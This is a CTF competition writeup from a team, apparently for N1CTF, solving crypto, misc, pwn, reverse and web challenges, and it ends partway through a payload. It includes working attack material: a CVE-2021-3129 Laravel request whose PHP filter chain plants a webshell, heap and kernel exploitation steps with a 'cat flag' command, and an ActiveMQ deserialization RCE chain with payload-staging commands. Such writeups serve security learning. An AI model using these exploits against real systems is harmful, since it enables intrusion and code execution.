Crypto
e2W@rmup
Solved by: tl2cents
A detailed writeup will be posted on the blog: https://tl2cents.github.io/
This nonce-generation scheme comes from a backdoored ECDSA signing routine used to steal Bitcoin private keys; see the paper "The Curious Case of the Half-Half Bitcoin ECDSA Nonces". Build the basic lattice, then apply recentering to shorten the target vector, and the shortest vector yields the private key.
exp
e2D1p
Solved by: tl2cents, lyciumlee, zjlhhh123, fcy
A detailed writeup will be posted on the blog: https://tl2cents.github.io/
The basic idea is similar to last year's N1CTF: turn every mask into a bit vector and build a matrix M from them; compute its left kernel, then LLL-reduce it (the LLL can be run directly inside one extended lattice) to obtain a family of small exponents e_i satisfying (the first condition does not have to be encoded explicitly in the matrix M)
$$\sum_{i=1}^{200} e_i = 0, \quad \sum_{i=1}^{200} e_i \, M[i] = \vec 0$$
so that
$$\prod_{i=1}^{200} c_i^{e_i} \equiv 1 \pmod p$$
Taking the negative exponents (in absolute value) and the positive exponents separately, compute a left-hand product and a right-hand product over the integers; their difference is an integer multiple of p, and the GCD over several such relations recovers p.
Afterwards, solve over QQ with the target vectors
$$(1,0,\cdots,0), (0,1,\cdots,0), \cdots, (0,0,\cdots,1)$$
lift the solutions to the integers, and the flag can be recovered bit by bit.
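The GCD step above, as an added example that is not part of the original writeup. It uses a toy model of the ciphertexts, c_i = s · ∏_j h_j^{M[i][j]} mod p with a secret common factor s and secret bases h_j (an assumption standing in for the challenge's actual construction), builds the 0/1 mask matrix M so that integer relations exist, checks each relation against both conditions, and recovers p from the integer differences. The relation-finding step (left kernel plus LLL) is not reproduced; the relations are written down by hand.

```python
from functools import reduce
from math import gcd
import random

P_TOY = 2**127 - 1  # constructed toy modulus (a Mersenne prime); "forgotten" and recovered below


def make_toy_instance(seed=2023):
    """Toy model (an assumption, not the challenge's construction):
    c_i = s * prod_j h_j^{M[i][j]} mod p with secret s and secret bases h_j."""
    rng = random.Random(seed)
    # 0/1 mask rows chosen so that integer relations exist: every adjacent pair of rows
    # sums to the all-ones vector, hence M[0]+M[1] == M[2]+M[3] == ... as integer vectors.
    M = [
        [1, 0, 1, 0], [0, 1, 0, 1],
        [1, 1, 0, 0], [0, 0, 1, 1],
        [1, 0, 0, 1], [0, 1, 1, 0],
        [1, 1, 1, 1], [0, 0, 0, 0],
    ]
    s = rng.randrange(2, P_TOY)
    h = [rng.randrange(2, P_TOY) for _ in range(4)]
    cs = []
    for row in M:
        c = s
        for hj, bit in zip(h, row):
            if bit:
                c = c * hj % P_TOY
        cs.append(c)
    return M, cs


def relation_holds(M, e):
    """Both conditions from the writeup: sum(e) == 0 and sum_i e_i * M[i] == 0 (integer vectors)."""
    if sum(e) != 0:
        return False
    cols = len(M[0])
    return all(sum(ei * row[j] for ei, row in zip(e, M)) == 0 for j in range(cols))


def relation_multiple(cs, e):
    """Split e into positive and negative exponents: L = prod c_i^{e_i} over e_i > 0,
    R = prod c_i^{-e_i} over e_i < 0, both over the integers. Because prod c_i^{e_i} == 1
    (mod p), L - R is a multiple of p."""
    left = right = 1
    for c, k in zip(cs, e):
        if k > 0:
            left *= c ** k
        elif k < 0:
            right *= c ** (-k)
    return abs(left - right)


def strip_small_factors(n, bound=10_000):
    """Remove spurious small cofactors that the GCD of a handful of multiples may still carry."""
    for q in range(2, bound):
        while n > q and n % q == 0:
            n //= q
    return n


def recover_modulus(cs, relations):
    return strip_small_factors(reduce(gcd, (relation_multiple(cs, e) for e in relations)))


def e2d1p_demo():
    M, cs = make_toy_instance()
    # hand-picked relations (the real solve obtains these from the kernel/LLL step)
    relations = [
        [1, 1, -1, -1, 0, 0, 0, 0],
        [1, 1, 0, 0, -1, -1, 0, 0],
        [1, 1, 0, 0, 0, 0, -1, -1],
        [0, 0, 1, 1, -1, -1, 0, 0],
    ]
    assert all(relation_holds(M, e) for e in relations)
    p = recover_modulus(cs, relations)
    # check the congruence itself: prod c_i^{e_i} == 1 mod p (negative exponents via modular inverse)
    ok = all(
        reduce(lambda acc, ck: acc * pow(ck[0], ck[1], p) % p, zip(cs, e), 1) == 1
        for e in relations
    )
    return p, ok
```

With the real data the relations come from the reduced kernel vectors; the products L and R are computed over the integers, never reduced, because reducing would require the very modulus being recovered. A single relation gives k·p for an unknown cofactor k, which is why several relations are combined with a GCD and any residual small factors are stripped.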
Exp
LLL & GCD to recover the modulus p
Recovering the flag bit by bit
e2$m4
Solved by: tl2cents, zjlhhh123, Ichild
The full C code and follow-up scripts will be posted on the personal blog (https://tl2cents.github.io/).
Unintended solution: brute-force the round keys. Each round key is 32 bits, so recovering 4 round keys costs about $2^{34}$ in practice. A round-key guess is verified as follows. Each encryption round consists of two steps:
- tfunc: buf[i+4] = buf[i] ^ tfunc(buf[i+1] ^ buf[i+2] ^ buf[i+3] ^ rk[i]), which depends on the round key but not on the dance time.
- pfunc: buf[i+1:i+5] = pfunc(buf[i+1:i+5]), which depends on the dance time but not on the round key.
Let c1 and c2 be the ciphertexts of the same plaintext encrypted with dance time 31 and 30 respectively. The dance sbox used in the last round is the same for both. Enumerate the last round key and decrypt one round with it, giving candidate states c1_t and c2_t after round 31. In round 31 the dance box used by pfunc differs between the two, but pfunc does not depend on the round key, so push c1_t and c2_t through their respective inverse pfunc to get c1_final and c2_final. If the guessed last-round key rk is correct, c1_final and c2_final must be identical, because the first 30 rounds were exactly the same for both!
Recovering four consecutive round keys yields the whole 32-round key schedule.
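The verification trick above, as an added Python example that is not the team's C solver. tfunc is the SM4 T transform (S-box and linear transform L taken from the SM4 standard); pfunc and the dance schedule box_index are hypothetical stand-ins, since the writeup does not reproduce the challenge's versions. The schedule is chosen so that, for dance times 31 and 30, only round 31's permutation differs, which is exactly the property the check relies on. The round keys are constructed, and the last one is kept small so the demonstration search covers 2^12 candidates instead of 2^32.

```python
ROUNDS = 32
MASK32 = 0xFFFFFFFF

# S-box of the SM4 standard (GB/T 32907-2016), 16 rows of 16 bytes
SBOX = bytes.fromhex(
    "d690e9fecce13db716b614c228fb2c05" "2b679a762abe04c3aa44132649860699"
    "9c4250f491ef987a33540b43edcfac62" "e4b31ca9c908e89580df94fa758f3fa6"
    "4707a7fcf37317ba83593c19e6854fa8" "686b81b27164da8bf8eb0f4b70569d35"
    "1e240e5e6358d1a225227c3b01217887" "d40046579fd327524c3602e7a0c4c89e"
    "eabf8ad240c738b5a3f7f2cef96115a1" "e0ae5da49b341a55ad933230f58cb1e3"
    "1df6e22e8266ca60c02923ab0d534e6f" "d5db3745defd8e2f03ff6a726d6c5b51"
    "8d1baf92bbddbc7f11d95c411f105ad8" "0ac13188a5cd7bbd2d74d012b8e5b4b0"
    "8969974a0c96777e65b9f109c56ec684" "18f07dec3adc4d2079ee5f3ed7cb3948"
)


def rotl(x, n):
    n %= 32
    if n == 0:
        return x
    return ((x << n) | (x >> (32 - n))) & MASK32


def tfunc(x):
    """SM4 T transform: byte-wise S-box, then the linear transform L."""
    b = 0
    for shift in (24, 16, 8, 0):
        b |= SBOX[(x >> shift) & 0xFF] << shift
    return b ^ rotl(b, 2) ^ rotl(b, 10) ^ rotl(b, 18) ^ rotl(b, 24)


def box_index(rnd, dance):
    """HYPOTHETICAL dance schedule: rounds 1..dance use a round-specific box, later rounds
    use box 0. For dance times 31 and 30 only round 31 differs, as the writeup requires."""
    return rnd if rnd <= dance else 0


def pfunc(words, box):
    """HYPOTHETICAL key-independent permutation of the 4-word state, parameterised by box."""
    r, s = box % 4, (box * 7) % 32
    words = words[r:] + words[:r]
    return [rotl(w, s) for w in words]


def pfunc_inv(words, box):
    r, s = box % 4, (box * 7) % 32
    words = [rotl(w, 32 - s) for w in words]
    return words[-r:] + words[:-r] if r else words


def encrypt(pt, rks, dance):
    x = list(pt)
    for rnd in range(1, ROUNDS + 1):
        x0, x1, x2, x3 = x
        x4 = x0 ^ tfunc(x1 ^ x2 ^ x3 ^ rks[rnd - 1])        # key-dependent step
        x = pfunc([x1, x2, x3, x4], box_index(rnd, dance))   # dance-dependent step
    return x


def peel_last_round(ct, rk, dance):
    """Undo round 32 under candidate rk, then undo round 31's pfunc with that dance time's box."""
    x1, x2, x3, x4 = pfunc_inv(ct, box_index(ROUNDS, dance))
    x0 = x4 ^ tfunc(x1 ^ x2 ^ x3 ^ rk)
    return pfunc_inv([x0, x1, x2, x3], box_index(ROUNDS - 1, dance))


def brute_last_round_key(c1, c2, candidates):
    """c1, c2: the same plaintext under dance times 31 and 30. Only the correct rk makes the
    peeled states identical, because rounds 1..30 were identical for both encryptions."""
    return [rk for rk in candidates
            if peel_last_round(c1, rk, 31) == peel_last_round(c2, rk, 30)]


def sm4_demo():
    rks = [(0x9E3779B9 * (i + 1)) & MASK32 for i in range(ROUNDS)]  # constructed round keys
    rks[-1] = 0x0ABC  # kept small so the search below is quick; the real search is 2^32
    pt = [0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210]
    c1, c2 = encrypt(pt, rks, 31), encrypt(pt, rks, 30)
    return brute_last_round_key(c1, c2, range(1 << 12))


if __name__ == "__main__":
    print([hex(k) for k in sm4_demo()])
```

Each candidate costs two tfunc evaluations and two inverse permutations, and a wrong key is rejected by a 128-bit comparison, so false positives are not a concern. Once rk32 is known it is peeled off both ciphertexts and the same comparison is repeated with dance times 30 and 29 for rk31, and so on; SM4's key schedule is invertible from any four consecutive round keys, which is what the writeup's last sentence uses.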
The brute-force function was added to a modified copy of the open-source SM4 C code at https://github.com/siddontang/pygmcrypto/blob/master/src/sm4.c.
Round keys recovered in about 4 minutes.
Misc
guess by cyberutopian
Solved by: thiner, ucasqsl
Soufflé is a Datalog-style language. In short, it uses inference in first-order predicate logic as its control flow. (Learning it is skipped here; a third-year course called Fundamentals of Artificial Intelligence covers it.)
.functor hash1(x:symbol):number
.functor hash2(x:symbol):number
.functor GETFLAG():symbol
.decl SALT(x:symbol)
//SALTS
.output SALT
.decl FLAG(x:symbol)
FLAG(@GETFLAG()).
.decl HINT(x:symbol)
HINT(substr(x,0,4)) :- FLAG(x).
.decl HASH(x:number)
HASH(@hash1(x)) :- FLAG(x).
.decl SALT_HASH1(h:number,s:symbol)
SALT_HASH1(h,s) :- h=@hash1(cat(flg,s)),FLAG(flg),SALT(s).
.decl SALT_HASH2(h:number,s:symbol)
SALT_HASH2(h,s) :- h=@hash2(cat(flg,s)),FLAG(flg),SALT(s).
.decl GUESS(x:symbol)
//GUESS
.output GUESS(attributeNames="ans")
.limitsize GUESS(n=1)
FLAG, GUESS, HINT, SALT_HASH1 and SALT_HASH2 are first-order predicates; applied to arguments they are propositions. @hash1, @hash2 and @GETFLAG are functions from a library written by the challenge author.
Simply put, we need to find an inference rule that derives GUESS(flag).
We know FLAG(flag) holds, so writing
GUESS(x) :- FLAG(x)
should give us the flag. That is exactly when we discovered that the challenge blocks some characters.
If the letter F is blocked, then neither the FLAG proposition nor the GETFLAG function can be used.
So we need to recover the flag from HINT, SALT_HASH1, SALT_HASH2 and the like.
Recovering the flag from the hashes is very unlikely: the hash multiplies the accumulator by an even number at every character, so anything beyond the first 32 characters has no effect on the hash value.
While reading the Soufflé documentation we found the following:
https://souffle-lang.github.io/types#type-conversion
Converts the expression as(a, Variable) to an expression of type Variable although a is of type VariableOrStackIndex. Note that type casts between numbers and symbols are particular dangerous because strings for certain ordinal numbers may not exist. E.g., the fact A(as(1034234234, symbol). most likely will cause troubles in conjunction with an output directive since a symbol with ordinal number 1034234234 may not exist.
This passage says conversions between strings and integers are dangerous. Dangerous things are our friends, so we guessed blindly that the numeric representation of a string is a pointer: take a string, add an offset, and maybe we get the flag.
However, when we printed the SALT strings, the numeric form turned out to be ordinal numbers 0, 1, 2, 3, ..., 10.
We tried the following payload to pull the flag:
SALT_HASH1(_,_), u = max t: {SALT(s), t=as(s,number)}, x = as(u+1,symbol)
The flag did come out, but since GUESS is not the first relation in the output, the server reported an error.
Souffle error? b'---------------\nSALT\nx\n===============\no/os2q/qqF9ithosyo0Wqo/9o/D8l.\nrysnq0q9yim/.t2.gs8e0wc2//tys\n200q.qygtmqn0qqo9a0sn2i\ns7y.m806eqyqe7lq92.q://.n6\n===============\n---------------\nGUESS\nans\n===============\n0c0f8d1094b913ff787b3e23a5b4e125ada00e0fbdb8d017a2a6790ca9e27123\n===============\n'
Later we got smarter and used HINT instead of SALT (HINT depends only on FLAG):
HINT(s), x = as(as(s, number)-1,symbol)
This went through.
exp:
downloader
Solved by: surager
Use .wgetrc to set the download directory and turn on timestamping (so that existing files get overwritten):
dir_prefix = /app
add_hostdir = off
timestamping = on
Then write a run.sh that overwrites /app/run.sh.
Done.
Pwn
n1canary
Solved by: Csome, surager
No libc is given, no PIE, Partial RELRO, and the binary has a stack canary. There is a backdoor, and a hand-written C++ BOFApp class. At the start you input a 64-byte canary, then the object is fetched and run.
There is a try/catch, and the following payload triggers an arbitrary call: b"1" * 0x68 + p64(0x403407) + p64(A)
n1sub
Solved by: V1me, hawk
A UAF, but with a random size and a random offset.
The vulnerable buffer is allocated with GFP_KERNEL_ACCOUNT, so pipe_buffer objects can be used for the spray.
And since a pipe's buffer array can be resized, it covers many of the random sizes.
So the plan: trigger the free of the vulnerable buffer, then spray pipe_buffer arrays of various sizes.
Then, using the pipe primitive, there is a 0x8/0x28, i.e. 1/5, chance of hitting the flags field.
Set the lowest byte of flags to 0x10 (PIPE_BUF_FLAG_CAN_MERGE) and it's done.
n1array
Solved by: C10-v, eqqie
Mostly reversing work.
The program maintains a hash table; each entry corresponds to an array.
Each array has a name (used as the hash key), a type array (bytes) and a value array (ints). In theory these two arrays have the same length.
However, value has two modes, selectable at input time:
- a normal array, where the user enters every element
- a default array, marked by an input bit (call it is_default); if set, every element of the array is taken to be the user-supplied default value, and the user does not enter each element, so this input takes very little space.
The user can enter three kinds of atoms (name, type, value), in any order and any number of times; in theory a later input overwrites an earlier one.
But looking at parsevalue: when a normal value array (value1) is entered first and then a default array (value2), array->value.buf points to the first atom's value1_atom.buf, while array->num is set to the second atom's value2_atom.nelts.
After all atoms are read, array->num is set according to whether array->value.buf is non-null; and looking further at printvalue and editvalue, both decide whether the array is a default array based on array->value.buf.
So we can index value1_atom.buf with a length of value2_atom.nelts, which is essentially unrestricted, giving arbitrary heap read/write.
From there it is easy: use the out-of-bounds read to leak libc from an unsorted-bin chunk, and since other chunks hold pointers into the heap, leak the heap address as well.
Then, with the out-of-bounds write, editval on array1->value.buf[] overflows into the neighbouring array2's editable value or type pointer; set it to the target address addr, and an editval on array2 writes arbitrary data at addr.
libc 2.31-0ubuntu9.7_amd64, so __free_hook is available.
n1proxy
Solved by: eqqie, h1k0, C10-v
A Rust challenge implementing a remote proxy.
First comes the client boilerplate: a key exchange, and every message must be verified in the form sha256-pkcs1v15[rsa-dec(key_pri,text)], i.e. sign first, then digest. (The boilerplate took the most time.)
Once the connection is established, the main logic starts. The user sends a ProxyType and a ProxyStatus.
type is the connection type, i.e. the protocol family: TCP, UDP, Unix socket, and so on.
Status selects the operation:
connect: given an address, the remote host connects to it (the actual proxying) and returns the connection's fd
close: given an fd, close the proxied connection
send: given an fd and data, send the data over that connection
recv: given an fd and a length, read that many bytes from that connection
listen: Unix sockets only. Given ip-port, create a listener (the local unix socket file is hash(ip|port)) and block in accept until a connection arrives (used together with the connect above); returns accept's return value. This looks like a test feature; combined with connect it builds a duplex pipe.
The proxy's overall protocol exchange:
(handshake)
server --> client | HELLO_MSG: "n1proxy server v0.1"
client --> server | CLIENT_HELLO: "n1proxy client v0.1"
client --> server | conn_type
server --> client | key_exchange_sign, key_exchange
client --> server | client_verify_len, client_verify
client --> server | client_key_len, client_key_n
client --> server | client_key_len, client_key_e
server --> client | new_session_sign, new_session[E_cli(session_key), E_cli(time)]
(new session)
client --> server | E_sess(pre_conn[type_u32, status_u32, signature])
server --> client | E_sess(ok_msg[ok_msg, key_exchange_sign])
(connection operations)
switch status:
Listen:
client --> server | E_sess(conn_data[host_len, host, port, signature])
// new_unix_socket_listen(&target_host, target_port)
server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
Close:
client --> server | E_sess(conn_data[fd, signature])
// close(fd)
server --> client | E_sess(resmsg[0, key_exchange_sign])
Conn:
client --> server | E_sess(conn_data[host_len, host, port, signature])
// ProxyType::Tcp => my_connect(&target_host, target_port)?,
// ProxyType::Udp => my_new_udp_connect(&target_host, target_port)?,
// ProxyType::Sock => new_unix_socket_connect(&target_host, target_port)?,
server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
Recv:
client --> server | E_sess(conn_data[fd, data_size_u64, signature])
// TCP: my_read(fd, data, len);
// ProxyType::Udp => my_recvfrom(target_fd, recv_data_size as usize)?,
// ProxyType::Sock => my_recv_msg(target_fd, recv_data_size as usize)?,
server --> client | E_sess(resmsg[data[recv_data_len, recv_data], key_exchange_sign])
Send:
client --> server | E_sess(conn_data[fd, data_size_u64, data, signature])
// TCP: my_write(fd, data, len);
// ProxyType::Udp => my_sendto(target_fd, &send_data)?,
// ProxyType::Sock => my_send_msg(target_fd, &send_data)?,
server --> client | E_sess(resmsg[send_res, key_exchange_sign])
Rust itself ships with fairly complete networking support, but this challenge uses the libc crate and calls glibc through POSIX interfaces instead, wrapping every glibc call in unsafe, which leads to some hidden bugs.
The spot we ended up using:
Roughly: in that snippet, recv_iov[0].iov_base (line 3) is allocated on line 4, but its lifetime ends after line 6; because all of the references live inside unsafe blocks, the compiler cannot catch this. So the recvmsg on line 16 is a UAF that writes the data read from the duplex pipe into the freed chunk, and line 21 allocates a chunk of the same size again and copies the just-read contents into it.
Everything below was found by testing; since we do not know Rust's internals, we had to fall back on the ptmalloc / libc 2.27 way of thinking.
First, call my_recv_msg once with a large enough chunk and run through the flow once. At the UAF, what comes back is an unsorted-bin (or large-bin, not reliably reproducible) chunk whose bytes 8:16 consistently end in ...ca0, i.e. the familiar main_arena+96. Bytes 0:8 are sometimes a libc leak and sometimes an unstable heap address, so they are not very useful.
Next, try a tcache next-pointer hijack for an arbitrary malloc. Enter my_recv_msg again with a smaller chunk; the UAF write on line 16 writes __free_hook (at this point the tcache next pointer is overwritten). At line 21 there are several mallocs of roughly the same size, and the content written on line 16 gets copied into one of the hijacked allocations.
(Don't ask how we got this result; we really just tried writing __free_hook, and debugging showed a SIGSEGV at __free_hook. We have no idea why it happened to work.)
So, with a small adjustment: hijack malloc to return __free_hook-0x10 and write p64(__free_hook-0x10)+p64(addr1)+p64(system), so that __free_hook becomes system.
What is addr1? From testing, first there is the tcache_key check, but in theory any value passes it; we later verified that on this 2.27 minor version only addr1 = heap_base+0x10 aborts, presumably tripping the tcache double-free detection.
But it seems arbitrary values are not allowed either: bytes 8:16 appear to be used as an address that is written to (presumably Rust's allocator behaviour), so in the end we put a writable address in addr1 and it went through. (As a counterexample, we tried writing p64(__free_hook-0x8)+p64(system) at the hijacked allocation and got a memory access error, probably because system's address is not writable.)
After that every free becomes system. When system cannot find the command in PATH it only reports an error and does not affect the main process, so we allocate a chunk whose content is a command string; it will eventually be freed and our command runs.
The challenge gives no stdio, but system's output can be redirected through an fd. Any connection fd will do; in our script fd 9 was the connection between the Rust process and our Python client (in theory not stable, since the challenge is multithreaded and fds change across runs in the same container, but roughly predictable). cat /home/ctf/flag >&9 delivers the flag in the Python window as a loglevel=debug recv message.
Honestly, we never set a single breakpoint on this challenge, because we really had no idea where to put one (
Reverse
h2o
Solved by: Ichild
Same as HITCON's lessequalmore.
First, reimplement the VM in Python to emulate execution and dump the executed instructions: 200 million lines, a 4 GB text file. Deduplicating the instructions leaves about 20k lines of code.
Look for patterns first and simplify certain operations with regex matching, down to 6k lines. The rest is grunt work: about 10 hours of manual reversing of the key logic gives:
Simplify further:
A few functions were not reversed, but the operation can be guessed from the logic, and what is shown above is already clear enough: a modified XTEA.
Solving:
N1LLua
Solved by: lxr, Ichild
The main logic is main.lua; luadec -dis shows the bytecode.
It basically loads a Lua 5.2 module and calls it to encrypt.
The encryption logic is a TEA structure:
Reversing the v_execute function shows that pow was replaced with a custom encryption operation.
That still did not decrypt correctly, so we set breakpoints on pow and the built-in bxor and traced the encryption: there is an extra (>> 6) ^ 0x15734145 operation.
Then extract the cipher from Assembly-CSharp.dll decompiled with dnSpy, and it's done:
Addition Plus
Solved by: mcsage, surager, Cur1ed
The call at 0x1344 invokes the following functions in turn:
- 0x15B0
- 0xbc90
- 0x14200
- 0x1d4c0
- 0x28120
- 0x33390
- 0x39f50
- 0x436c0
Inside each function is a set of constraints:
The flag checker splits the input into 8-byte groups, calls the 8 functions above on them in turn, and compares the return values with initial values in .rodata.
Solve directly with z3 to get the flag.
n1go
Solved by: Ichild
The Go source is provided, but the strings are obfuscated; extract them first:
1 MB shrank to 200-odd KB. There are many repeated strings, presumably failure messages; we need the success message to locate the final target. Extract the strings:
Search the source for congratulation.
There is only one function: starting from main, each character read sends execution into a different function depending on its value, clearly a graph problem; parse the graph structure and find a path. The source is very regular, so simple processing parses it.
Web
strangeport
Solved by: byc_404, rmb122
The challenge lets you talk to ActiveMQ's OpenWire port. Firing the 0day at it directly is blocked by the lack of egress, so we settle for SSRF. When the SSRF triggers Gson deserialization, Gson reconstructs an object by calling its no-arg constructor if one exists, otherwise by instantiating it via Unsafe, and then sets the fields via reflection.
Following the later hint, we need a chain from a constructor to Runtime.getRuntime().exec(); on Linux the printer-service classes around PrintService come to mind, and we ended up at PrintServiceLookupProvider,
whose constructor starts an inner class as a new thread that concatenates the outer class's fields into a command. Hence RCE.
Finally, flag exfiltration: write a class to /tmp and run it, appending the flag to a new ActiveMQ queue, then connect with a local client to read it.
echo xxx|base64 -d >/tmp/Main.class
java -cp /opt/apache-activemq/lib/optional/*:/tmp/:/opt/apache-activemq/activemq-all-5.17.5.jar Main
laravel
Solved by: rmb122
CVE-2021-3129 with a modified exploitation approach: build the webshell through a PHP filter chain and write it straight into /var/www/html/index.php.
POST /_ignition/execute-solution HTTP/1.1
Host: chall-756f4e676a5a567a.sandbox.ctfpunk.com
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: XSRF-TOKEN=eyJpdiI6ImYzbmFzbmhCL0J3ZHVhUzJhVUFTS1E9PSIsInZhbHVlIjoiUy9sSU9XL0taMFY0aTI2enYrLzUxN3pTZXNOVjBvMjRyRU1MUFhya3BrTDJpcW54YjFNMDJWZlVZeC8xdFcwUlZQVEN6WWFvdVM4bG5UQ3lTVWtDMVFTR0dkcFdicFU4N0M2a0pIS0JrWEk4a0NMZEU2SUR6eDJxWFFBZFRvWmkiLCJtYWMiOiIwZGUzN2MxZDgzNWI3ZWU1NTIyOGY0NTQ1NWE5NDJmNzI0MWE2ZjIyMDA5ZTE0YmM3OTAwZWE2NWQ0MTA1NGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjRJWjFGVlBFQXJNNXRieTRySHBsZWc9PSIsInZhbHVlIjoiRGxyNVNEQ3p2RXlMc3Y3WVM2YVlhb2FwNG9vSUpjam9ZZU0rSHQ0MVNtOWZLR3hjaWR6MlpKS3FhT2ZQUU14VWdyQThWY3FNVUhuazdoZzY4N3preXVLOFd3RUtyRUQ5SnlmVUJWbkR4YTZGL1h2MCs4b3d4YUZ3ajU2OG9iWmoiLCJtYWMiOiJhMWUyODA2ODRlYzY0MTEyMzY5ZTYyZWM0MWU1MDQ1ZTVlZjZjNzhiMGMyOWM2NjRhOWYyY2U3OTUxMWE4MzU3IiwidGFnIjoiIn0%3D
sec-gpc: 1
Connection: close
Content-Type: application/json
Content-Length: 6640
{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "xxx",
"viewFile": "php://filter/read=convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7
|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv
